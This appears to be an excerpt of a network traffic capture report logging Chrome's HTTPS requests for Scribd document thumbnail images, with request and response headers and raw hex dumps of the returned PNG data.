                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: af 9f db 56 e3 5c ac 2b 2b cc 90 f1 cf 67 4b 6a ed 69 1f a5 f9 ea 3b 5e 36 fb e1 1c 17 be f1 52 c5 f8 b1 a7 77 82 8e bc 40 c9 ad da fa da 3b 01 02 38 cc 52 8f d7 e3 bd 5e 5f 7b 6b dd 06 9b 01 d5 f8 6a 94 c9 dc cc 14 b4 aa 12 7d c6 a0 dc 7a d7 52 88 fd 25 99 40 5e 02 97 6a 43 39 ce 16 e3 0f ad 59 3c 09 c4 fe 12 db a7 28 13 03 62 ca 60 63 d2 16 b6 e4 53 2e 62 63 73 d1 aa 55 6e ef 7d 8a fa d1 cb 48 d0 58 55 80 40 60 d9 8b 05 5b 0c 8d 8f ca 48 19 4e ca c8 f9 7b 29 1f 1e 2b 40 c2 50 c3 28 93 6b e3 6c 9e e0 52 92 82 ac e4 51 9e 67 b3 78 03 cb a0 52 8e b7 9d 54 82 ab 9f d6 0e 34 f9 00 50 9d 44 ca c5 52 a5 69 3c b7 70 00 96 41 19 d5 bb fe e8 2f f3 86 15 d6 40 1c 15 d7 ba 26 0f 22 84 17 2c 0a 0c 1b c7 e7 4a f8 54 39 93 8a 96 25 b1 80 38 65 16 77 f1 ac 86 97 4a 7c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: V\++gKji;^6Rw@;8R^_{kj}zR%@^jC9Y<(b`cS.bcsUn}HXU@`[HN{)+@P(klRQgxRT4PDRi<pA/@&",JT9%8ewJ|
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 01 66 04 44 16 14 81 41 b9 4a 41 c1 28 14 20 84 8b 14 e2 e0 1a 41 81 01 06 d7 a1 b8 94 0e ee a6 00 51 7c 98 d1 9a 2a d4 92 9d 9a 07 5e 7c f2 cd aa 79 d8 d3 09 17 e7 6d 35 34 c5 43 2a a9 ee bf 4f 9f f3 fd df f7 9f ef ef db 26 10 3d 06 d3 33 16 0f 9c 26 3f 4d 3a 15 41 0b 5b 34 0c 07 20 29 18 9b 5d 0a 71 66 f7 dc ae 8c 74 3d 1d 87 22 e1 1f 0e ca 26 13 cf b7 6f 44 c5 e4 7b d0 97 4a 43 ae e1 9f b1 39 01 35 2e 28 a3 f4 95 99 31 9d 62 61 a0 97 67 84 9a fe e3 b0 ce 35 da 45 b1 30 c6 80 b1 ba 92 57 39 7a 5a a8 b6 ae f1 d8 0d 4e 5f f9 4d 88 dd 81 fa b5 6f 06 5e 55 1c 12 d2 8e c0 dc 03 08 2e 38 13 6f 49 54 8b 9b 83 f8 25 0f 0d d5 6f 2f 8f 6d 8d 55 41 a0 f2 72 a7 c7 9c ee b3 5a 15 c0 ee 1c 87 3a 42 bc 0b c2 a8 c3 c3 93 c2 a4 94 a5 d7 69 34 66 42 2f 1a ac 21 30 ac 1f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: fDAJA( AQ|*^|ym54C*O&=3&?M:A[4 )]qft="&oD{JC95.(1bag5E0W9zZN_Mo^U.8oIT%o/mUArZ:Bi4fB/!0
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: e3 81 d7 47 59 04 33 0b 92 79 12 ef 3d de 7e a4 ce b5 da 58 0c 15 85 13 fe 8c bf c4 5b e2 e7 e7 da 53 72 13 b6 00 d2 db 9c 99 94 59 1f 4d 70 91 a8 b5 fa b5 9c e6 30 93 c0 e5 04 02 da e4 ba ea cc 17 e9 e9 ef af 79 33 88 d3 c5 4b 84 f3 43 9b 2b 1b 6b 92 0e 7f 78 f1 f6 ea 9b 20 e6 2b 02 65 87 45 1e fa 3e 25 b5 b1 b1 f9 56 57 fd eb 82 de 60 3f c6 d7 ad 98 60 fa 8d 14 0b 31 ec 8f 02 42 c0 0f b3 e8 2f a8 af 7c b7 35 5d b9 15 d6 80 53 6a c3 85 32 7f 74 fd ee cd 3e 07 2c c7 2e 58 21 b3 2f 2d 38 73 eb 7a 53 f5 6d 39 fc 19 ca 09 8b dd 71 a5 25 a6 be ae ba 39 bd b4 b4 38 9a 35 ce 31 6e 46 05 29 9e 2c 0e a6 d6 30 a8 8f bd e8 38 ef cd a5 fd 55 9a c1 32 29 f3 fc b5 99 b7 f1 44 c0 4e a6 fd 74 8c 41 e6 50 a7 68 82 15 a1 ef 0f b5 1c 67 1f 19 49 d6 1c a4 a1 ba cc b5 1e a1
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GY3y=~X[SrYMp0y3KC+kx +eE>%VW`?`1B/|5]Sj2t>,.X!/-8szSm9q%9851nF),08U2)DNtAPhgI
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 96 7b 8e 52 f1 4a 67 0f 18 b6 3b 37 7a 3a da 8e cf e2 38 96 89 e9 87 de 60 18 25 df 3f ad c5 c9 7b a3 fa 37 bc b3 da 2e 0d ec f9 50 81 8a 02 53 24 a5 73 14 c9 ad 1a ba cd c0 c1 78 a5 8d 3d 97 ac 9e ba 4e 0d 71 73 13 f5 df 35 74 26 c5 04 64 82 a8 9a 63 34 0c 7f fd ee a5 e0 e3 e1 63 83 e5 6f 9b bf 66 51 59 66 72 05 a8 a2 6a 3c c0 fb 4a 8e 34 30 fc 44 ba 8a 01 dc c5 d0 9a 22 dd f3 63 f5 67 af ab 4a e5 3a 65 e7 33 dc 44 92 c6 3c d7 dc cb b3 85 a1 46 b4 ac fd c4 53 2a bb ed 12 61 c6 d4 50 5e 0b 5d 54 aa 54 fd e9 37 c7 1d a1 0b e5 65 9e a7 36 16 cd 84 55 6c 5e 1f ad a1 95 de 69 4b c9 af 4f 15 86 00 d7 3c 92 3c dc ec 3c 5a 84 28 b3 db 0d 6c d9 49 27 c2 cb 95 07 cf 99 49 82 b4 73 73 03 27 1c d6 2b 1e 23 f7 f8 05 ad a1 e8 cb fb f0 1c bb 3a b7 85 46 1c aa 43 0e 07
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {RJg;7z:8`%?{7.PS$sx=Nqs5t&dc4cofQYfrj<J40D"cgJ:e3D<FS*aP^]TT7e6Ul^iKO<<<Z(lI'Iss'+#:FC


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        123192.168.2.1649865151.101.130.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC411OUTGET /img/word_document/224266633/149x198/196f9b9902/1731728881?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-2-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 11734
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 69
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 212935
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100118-CHI, cache-ewr-kewr1740047-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 55, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522381.450382,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 e5 df 04 e4 de 0d 01 68 7e e7 e0 0a e5 e1 02 e6 e1 03 e8 df 03 e3 e1 04 e6 df 05 e6 df 07 e5 df 04 e5 df 0b e3 e4 01 e7 dd 0c e5 e1 00 02 68 7b eb de 04 e7 e2 02 e5 e4 02 e0 e4 03 e3 df 0a e9 de 0c e5 e1 0b e3 e1 08 eb de 0b 00 67 7e 03 68 76 e7 df 02 ea db 13 ea e3 02 e1 e1 15 e2 db 15 e6 de 13 e5 da 1f e3 d9 29 e2 de 17 da d1 19 e3 de 02 e6 e0 13 56 55 57 e5 dd 1a e6 e1 19 e9 db 09 e6 db 15 e0 d9 20 40 40 43 e2 e2 0b e1 e0 02 07 6b 85 03 67 82 e3 e2 01 de d8 14 e0 e1 0c e0 e2 04 66 5f 62 ea df 03 d8 e1 19 dd e0 26 ce c4 1c 6d 60 62 af 9f 1d 74 64
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTEh~h{g~hv)VUW @@Ckgf_b&m`btd
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 11 ea 42 bd 18 a1 5b e7 ae 20 ae 70 5c 9c f2 ac af ff f0 db 95 c9 4b 9e eb 9e eb d7 3d 9e 3f 58 1d 9a 91 95 8d e9 8d 95 8d e7 1b 46 e7 3f 4a af a6 57 3c 9e e9 bb 9e 8d 11 fb fa cb 95 95 69 38 2c 6d 79 36 3c 1b 1b 5b eb af be 2d ad 5c 9f 1c d3 38 34 1f 50 0d 1f 56 5b 28 a3 d6 d8 47 75 54 55 75 91 e5 c4 3a 07 54 62 a5 22 a4 58 9e 6f ed ee 9e 43 35 95 37 eb 0d a5 f6 c9 77 5f 97 e6 4a 07 ed e3 76 fb e8 e8 e1 63 cf fa f1 c3 87 0f 8f db c7 27 0f ef 4e 7f 7d 7a 7c 70 00 87 70 f2 f1 0f c7 7b 07 c7 ed a3 03 78 78 0e e7 db c7 47 ed a3 bd e3 f6 fa 1c a5 a7 3e f2 2a 2a 07 e7 9a 18 4a 41 26 08 29 91 0e 01 55 c8 4b b3 a2 e8 13 79 9e 7e 5d 95 b1 ce f2 8a e8 a7 26 ff da 3e f8 d7 df 4a 73 5b 7b 7b 0f e0 e7 c1 c9 cb d2 3f 4f fe dd fe fe e8 e0 bb 93 83 8d 52 fb c1 e9 c1 c1
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: B[ p\K=?XF?JW<i8,my6<[-\84PV[(GuTUu:Tb"XoC57w_Jvc'N}z|pp{xxG>**JA&)UKy~]&>Js[{{?OR
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 17 a8 a8 ea 3e 4e 2c a2 34 80 c6 83 1b 5f 66 e2 08 8a b1 25 c4 35 50 12 2a af 97 54 03 d8 0b 70 aa 56 4f 89 1c 0f 54 a0 4e b9 ec 2e c4 02 f1 78 3c c1 04 62 09 11 7d d3 81 31 35 d9 33 2a 42 89 29 b4 9f 4b b0 cb 70 34 1d 72 c7 6d 32 13 14 54 19 51 31 a0 78 82 86 91 d4 87 d4 33 2a 05 86 a8 b6 2b 3e 8e 47 9b 5e 22 86 a0 ca b1 98 ad 6c 73 c5 11 56 20 9e 28 b0 30 93 82 7e 42 aa 0e 32 ca 16 8b 01 15 ea c0 40 80 09 00 55 17 ab d7 54 3e 1f 0b 41 85 a8 50 44 81 55 90 0a 01 26 ce b8 98 00 c3 84 60 5b 14 59 18 96 7b 49 45 a2 ba 12 df 52 25 64 ab 6c 71 26 16 73 c5 19 b4 82 4c a2 c9 81 57 bd a5 42 13 f3 7d a9 5e 61 23 3c 64 42 1c 51 c9 bd 17 8f b9 18 58 3f 17 ac 60 93 e3 38 18 23 7a 48 45 28 95 0a ec 7e b8 2e c0 12 02 55 2c 8e 22 2a c1 24 3a 8c ad 38 cb 30 2e 57 20 10
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >N,4_f%5P*TpVOTN.x<b}153*B)Kp4rm2TQ1x3*+>G^"lsV (0~B2@UT>APDU&`[Y{IER%dlq&sLWB}^a#<dBQX?`8#zHE(~.U,"*$:80.W
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 9c de 2a bd 29 26 44 a6 2f 16 c9 cb 95 dc e1 e1 c6 20 93 cc 97 ca b2 90 b4 70 7a 7c aa 52 7c 6f 77 24 a5 82 88 98 2f bf 5d a5 ba ee 2b 08 91 10 03 e1 f3 b5 14 e2 72 a6 3a 69 7b 33 22 48 ad 7a ab b6 8b ea c5 f7 91 8b 93 f8 99 74 3a ac d7 4f 4b 17 9d 48 e5 67 5a 33 48 07 86 b3 cd 8b cd 76 35 ee 70 b9 88 71 06 19 19 9e db b6 c3 d3 73 4e d8 39 16 18 d0 c1 c9 15 af 91 0d f4 8f 0f 61 6e 2f c8 07 3c cf 1b 38 0c 37 7d 12 14 86 a9 19 88 9e ce 26 02 26 63 2a 32 67 3d 7d f3 63 79 37 5a d8 0e 3b 03 7d 07 52 3d 3a 32 c2 b2 23 c8 48 39 9f 6f b5 5a 67 8c 5e 4f dc 62 7f 2e 3f 58 a9 17 cb 22 c7 a5 8e b7 a3 bb d9 5c 96 85 d8 6c 25 ec 8b df 09 8f 45 2f 9a 53 a9 ed ed b9 87 b6 c2 f4 99 88 db 0e c2 bb 5e 0e ea 31 13 ff 27 d5 ba d4 29 78 4e 72 c2 09 ba 1e ca 6d 79 1e 1e 17 a3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *)&D/ pz|R|ow$/]+r:i{3"Hzt:OKHgZ3Hv5pqsN9an/<87}&&c*2g=}cy7Z;}R=:2#H9oZg^Ob.?X"\l%E/S^1')xNrmy
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 7e f6 b3 f7 89 25 70 6f d7 bb 36 f9 f6 5b bf 7f f6 9c 8e e5 71 fd 00 b6 f2 65 36 53 77 f5 dd d3 af f7 76 80 f0 23 01 b6 ea 72 ed 66 26 61 3e ab d5 5d 98 2a 91 79 a6 fc 42 ab 54 10 df 47 56 a6 f4 5d a8 4d 05 54 d8 55 ff aa 73 64 90 f8 2a 13 7c aa ed b7 f5 f9 32 63 d8 82 ef f0 d0 b7 76 78 b8 e2 e8 7f ed 87 59 1c f4 ad df 45 74 da 69 ff b2 e7 da c3 f5 ed db fa 73 6e 9e 20 53 be c3 e0 c6 fa e1 fa 58 b7 f9 91 3f f8 61 75 19 46 0b d2 a8 c7 35 bb 76 1f 41 14 6a 75 b7 a7 27 11 f9 f3 10 e1 f4 28 ba 9f 78 77 16 e5 83 2d 2a 09 d8 6a 82 40 74 bb 19 ff 57 2e 44 35 96 f1 3f bd 65 49 ac f9 5f af ee ad 25 46 fa 53 7b 9b b3 e3 b3 6f 37 1e a8 cd c3 4f 32 7f 42 24 01 4b 40 7b de 2d 1d 6b ff b2 2f f5 7c 79 7d 7d 0a fd 3a b8 f3 6a e0 d5 b6 37 d1 a7 42 88 c5 c5 8d cc d2 ec f8
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ~%po6[qe6Swv#rf&a>]*yBTGV]MTUsd*|2cvxYEtisn SX?auF5vAju'(xw-*j@tW.D5?eI_%FS{o7O2B$K@{-k/|y}}:j7B
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 57 6e 96 36 70 4c b9 34 30 a8 75 74 b5 97 0a ea 94 2e 64 7e 3f 8d db 71 7b bc c8 64 85 02 5f 08 c7 1b 61 be c1 17 1b b1 5a 25 56 28 c4 99 1a 23 54 2a 7c b8 c0 52 06 1c 1c 9e 70 49 da 6c 2b 04 a8 cc 2f eb 55 1c c6 a8 78 5c ad d4 6a f9 e3 5a b5 c6 9f 9c 54 8f 1b 31 68 42 23 7c dc 68 54 8e 63 b5 06 0b 11 cc 5e ce 05 9c 48 9b b3 21 a6 97 a3 96 5c 99 01 2a 7b 31 db 68 f0 b5 7c be c6 17 99 5a 2c 59 6b c4 1a e1 fc c9 49 1e a6 63 83 af c4 b2 3c 2d 06 d6 74 a9 57 d5 ee ca a1 cb a9 47 27 4a 69 37 a4 14 98 79 6e 96 63 39 c6 0d 57 f3 8b 01 57 62 e1 6e e4 68 3b 7d 3a 13 71 61 bf 37 14 42 3b 40 75 00 54 d4 69 60 c0 dd e1 02 2f 14 92 71 21 5b 10 c2 4c a1 10 cb c6 04 b7 88 23 6d 46 7d 9c ff 6d de d6 7e 2a 39 3a ba 5f 15 f3 0c de ca 80 ee da 49 b5 52 ad 25 c1 d7 63 30 9c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Wn6pL40ut.d~?q{d_aZ%V(#T*|RpIl+/Ux\jZT1hB#|hTc^H!\*{1h|Z,YkIc<-tWG'Ji7ync9WWbnh;}:qa7B;@uTi`/q![L#mF}m~*9:_IR%c0
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 6d 3a f7 87 a1 a1 76 19 1e 71 7b f5 bf b4 29 ba 44 73 ed ab df 7f 7c 65 7e 7e ec 93 cf ca 44 df 71 28 41 33 0c 19 1e 8c 7f 75 f7 ee 3f f2 c5 a2 c8 65 09 97 fe 18 58 65 d5 19 8c 36 5f 3a 3f de ac c5 34 6f 40 d3 4c d1 e3 50 db 51 29 9a 47 ad 38 3e ea d4 19 ba d0 4a 58 dd cf f0 33 fc 3f 83 7e 1f da 89 7d ec 8f 98 de 9a da d7 d1 21 ec e9 3a ec 14 fa 83 2e 38 f7 c4 2c 3f d8 50 eb 6c 81 69 0f 5c 2d 37 a7 10 ba b4 56 c4 d5 22 b7 50 26 b4 1e c8 d2 59 ab d4 72 52 dc 26 76 a8 1d d0 80 60 72 ee 2b fb 31 b9 0d 6d 13 5a c4 0e e8 d0 26 ba ae fd ff d1 46 b6 d5 63 9a d6 e6 33 b5 fc 0a bf 91 69 eb 42 9b 84 b1 ce 73 a0 8e c9 07 c9 07 4c ec 58 f2 03 e9 83 a0 6f 2d 78 da 3f 2f 80 be 4b 7f 70 ce 3d 12 89 44 1d 8e 68 c4 14 71 44 da 22 28 00 5c c4 e4 70 98 4c 51 20 47 1c 26 c4
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: m:vq{)Ds|e~~Dq(A3u?eXe6_:?4o@LPQ)G8>JX3?~}!:.8,?Pli\-7V"P&YrR&v`r+1mZ&Fc3iBsLXo-x?/Kp=DhqD"(\pLQ G&
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 1f 2a 7a 86 2f f1 35 8a a0 a7 37 37 37 17 97 56 5f 2c af 2e af 6e af 2e cf 6c cf 4c 2f 4f 2f cd fe 75 66 71 73 79 79 73 71 66 7b 79 79 7b 7a 1b 8e 88 61 13 7e cb 28 b1 ba bd 3c 33 b3 5c df 6a 21 5e 03 cb cc 97 80 99 05 12 e2 df 5e 9d c9 26 3c 07 9e c7 ed f7 75 7b 7d a5 d3 a9 21 70 3a 09 2c 6a d2 50 57 8b 7c 7b 43 9f 87 90 3a b3 25 0c 2d 34 83 33 41 ec 54 a8 6a d3 08 0d bd b6 c4 7d d6 6e b7 c5 62 b1 e1 6b c3 5e 62 78 78 a0 2b 14 32 da 43 1e 4b d8 1c d6 85 cd ad 15 c8 16 bd 41 d7 3b 39 38 10 8b 75 0f 0c 77 c7 9c 51 83 b5 77 40 1f a6 62 e8 e5 1e 36 eb 40 77 d4 6d 0f 59 0e 1b 33 b4 1c 9e 77 ba 4c 97 0b d7 4c 2e 62 af cf 46 36 0d 98 74 b6 50 c8 6e 34 ba cd b6 5f 57 ab f6 50 c8 73 ea 54 c8 13 f6 78 42 76 48 c0 e8 e4 84 c5 e6 09 59 b1 50 15 8b 0d 44 06 62 96 b0
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *z/5777V_,.n.lL/O/ufqsyysqf{yy{za~(<3\j!^^&<u{}!p:,jPW|{C:%-43ATj}nbk^bxx+2CKA;98uwQw@b6@wmY3wLL.bF6tPn4_WPsTxBvHYPDb
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC710INData Raw: e4 3c af b4 c7 7e cb c9 73 0d c4 30 58 2c 8d 87 97 12 9e d5 2d d4 1f 44 aa a1 95 d6 31 81 db 3f f8 6f 2f 49 76 79 f4 bd 0f 63 d6 5f 1e 4f 88 7f b7 fc 7d 6b 4a 1e 20 9a 54 0f ee b8 a7 d0 2a 7b b7 ad f6 3e dc ee 53 33 9e f0 b4 96 b8 3b 45 b7 42 a5 d5 ba 3f 5a fa a5 b0 8e bd d6 bc f9 9c 67 bb ad 9b 44 9f e3 a1 a1 29 2b 3d b3 33 f3 dc 05 fc 88 0e 21 3a e7 3e 38 a6 39 cc 7c f4 5b 6c 5f d2 d4 18 45 10 fa 41 a0 eb f9 29 e4 1d 18 68 ad 29 7f 09 dc 8b 07 9d 41 8f d9 e7 b9 f3 9c c0 2c c1 12 c9 29 58 1f 2d db a0 95 51 0c 51 1b 9b 26 76 44 20 18 a9 9c a2 08 3c 6d a4 ae 23 88 8a 96 98 bb 91 0f e3 5f cd da cf f7 3c f8 ad 9b 1f 37 d8 71 31 12 6b ab 21 d7 82 89 7d 7c 7d d0 d2 53 6e 99 91 d8 9a 88 b7 1a d6 3a 2f 06 6a 6f 8b 7c cf cd ce 33 cd 0b 86 77 b1 99 d9 28 42 76 14
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <~s0X,-D1?o/Ivyc_O}kJ T*{>S3;EB?ZgD)+=3!:>89|[l_EA)h)A,)X-QQ&vD <m#_<7q1k!}|}Sn:/jo|3w(Bv


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        124192.168.2.1649869151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC411OUTGET /img/word_document/263504218/149x198/5791495c90/1733362199?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 20840
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 87
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 160161
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100117-CHI, cache-ewr-kewr1740029-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 53, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522381.450465,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 01 01 01 ff ff ff 10 11 11 0c 0c 0c 14 14 15 12 12 14 0e 0e 0d e3 2c 28 12 12 12 10 10 10 04 04 04 09 09 09 06 06 06 08 08 08 16 15 14 0e 10 10 0e 0f 0e 19 18 18 1d 1c 1c 16 15 17 2a 29 28 31 2f 30 21 1f 1f 24 24 25 0c 0e 0e 13 13 13 23 22 21 1a 1a 1a 37 36 36 0a 0c 0a 42 3e 3c 1b 15 15 cd 9f 82 90 5b 47 9b 6b 56 29 24 23 d3 a9 91 4a 49 48 d2 a6 8b d8 b4 9f 72 4b 3d 30 2b 27 fe fe fe 23 17 17 dd b9 a2 7c 7a 7a 7b 4c 3c 3a 2b 26 a2 6b 54 cf 2c 28 e6 c5 b2 b0 77 5d 65 62 61 45 30 2a 6c 42 36 88 5a 48 4d 4c 4c af 81 69 72 71 70 21 1d 1c d8 b2 98 bb 8e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTE,(*)(1/0!$$%#"!766B><[GkV)$#JIHrK=0+'#|zz{L<:+&kT,(w]ebaE0*lB6ZHMLLirqp!
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 84 71 ab e7 3d 07 dd 18 c9 e8 e8 d2 9d 1e 4a 43 7f 7a a3 71 a6 84 15 35 c2 e4 8a 46 45 8b c6 1a c8 2e fd 1f 3f 83 ff 1f f7 d5 e8 e8 e8 9b 37 a3 a3 39 f8 c0 4a c0 37 43 91 4b 8f be 81 85 49 8f 1a 86 9f c8 f7 f0 e9 fc e7 3a 02 ed df 8f e6 72 7f d5 fe 9d 74 1c 7c 41 3a 0b 7f 8a 3c ff 9d db 4d 5b 52 30 2f 0a ab 4f 36 66 26 12 d3 f3 97 ef ee ed 7d f8 d3 c7 1f 3f 6d 04 67 a7 a6 27 87 b5 c8 fa af 07 b6 b6 7e 41 4b aa 40 6f d9 2c d2 a5 4b 97 46 24 89 76 5f 19 19 19 39 fe fd 77 de d0 83 17 be a7 4f 77 bf 3d ce 72 36 77 7c cb 82 f1 f8 5d 4b b7 c5 02 24 8e 0b fe 79 91 b4 0c 04 65 d5 27 c6 35 19 07 38 ee c6 81 5b 16 23 c9 f5 64 50 54 69 40 8a f1 54 4a cc 8a 52 68 9b db 1a f0 63 98 2c 91 5e 5a c2 35 13 3f 16 73 0d af ee 7d f8 b0 b1 32 6d 9e bf 71 6f 63 6f ef fd c7 b7
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: q=JCzq5FE.?79J7CKI:rt|A:<M[R0/O6f&}?mg'~AK@o,KF$v_9wOw=r6w|]K$ye'58[#dPTi@TJRhc,^Z5?s}2mqoco
